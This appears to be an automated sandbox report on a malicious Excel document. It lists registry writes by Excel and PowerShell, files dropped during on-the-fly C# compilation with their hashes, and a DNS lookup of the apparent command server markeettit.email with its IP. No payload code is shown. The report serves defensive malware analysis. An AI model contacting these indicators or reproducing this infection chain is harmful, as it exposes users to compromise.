EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
0`"
306022007C070000010000000000000000000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
7C070000D2B331B1F420D50100000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
12C6B4
040000007C0700003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F0C795B1F420D501B4C61200B4C6120000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
12C6B4
040000007C0700003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F0C795B1F420D501B4C61200B4C6120000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1916
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1321992217
1916
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992339
1916
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992197
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
12C6B4
040000007C0700003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F0C795B1F420D501B4C61200B4C6120000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C925
12C925
040000007C0700003F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006F0063003400380033002000640065006C00200030003400200047006900750067006E006F0020005F00530072006C002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000001000000D83FA88FF420D50125C9120025C9120000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
26005439
2752
POWershelL.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
EnableFileTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
EnableConsoleTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
FileTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
ConsoleTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
MaxFileSize
1048576
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
FileDirectory
%windir%\tracing
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
EnableFileTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
EnableConsoleTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
FileTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
ConsoleTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
MaxFileSize
1048576
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
FileDirectory
%windir%\tracing

Files activity

Executable files
0
Suspicious files
5
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2356
csc.exe
C:\Users\admin\AppData\Local\Temp\pnefnq9q.dll
––
MD5:  ––
SHA256:  ––
2752
POWershelL.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GJPDKVX6CS98V0M2ZBCG.temp
––
MD5:  ––
SHA256:  ––
3364
cvtres.exe
C:\Users\admin\AppData\Local\Temp\RESD23D.tmp
––
MD5:  ––
SHA256:  ––
2356
csc.exe
C:\Users\admin\AppData\Local\Temp\pnefnq9q.pdb
––
MD5:  ––
SHA256:  ––
2356
csc.exe
C:\Users\admin\AppData\Local\Temp\CSCD23C.tmp
––
MD5:  ––
SHA256:  ––
2752
POWershelL.exe
C:\Users\admin\AppData\Local\Temp\pnefnq9q.0.cs
text
MD5: 6b2bd80fdfb6965d0de7d15c422379b0
SHA256: e11c041fb3a098c00c58b6462deabe2d723fee907c62f4322848cd9ecdc63a48
2752
POWershelL.exe
C:\Users\admin\AppData\Local\Temp\pnefnq9q.cmdline
text
MD5: 853b4253776c0f47f159c7970ca794cc
SHA256: 2bfe40625ed2d8db352b5444cda18afb426cadfe68ed30cb27522beb404b129b
2752
POWershelL.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
2752
POWershelL.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12ce93.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
2356
csc.exe
C:\Users\admin\AppData\Local\Temp\pnefnq9q.out
––
MD5:  ––
SHA256:  ––
1916
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRC490.tmp.cvr
––
MD5:  ––
SHA256:  ––
3360
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DF3A9BA4CD0C6823AE.TMP
––
MD5:  ––
SHA256:  ––
3360
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\doc483 del 04 Giugno _Srl.xls
document
MD5: 85674182a8ae6de7104b57723c6744c3
SHA256: 14c5ae183ade2081359bdf2e69b49ecb382432e31f5d6558f9eb3c34fd2a96d3
3360
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFA465033782480479.TMP
––
MD5:  ––
SHA256:  ––
1432
POWershelL.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fc5e.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
1432
POWershelL.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
1432
POWershelL.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\59HKA8KTK6C1EBCHAFCB.temp
––
MD5:  ––
SHA256:  ––
3360
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVREDB8.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests.

Connections

PID Process IP ASN CN Reputation
–– –– 47.91.88.223:443 Alibaba (China) Technology Co., Ltd. US unknown

DNS requests

Domain IP Reputation
markeettit.email 47.91.88.223
unknown

Threats

No threats detected.

Debug output strings

Process Message
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144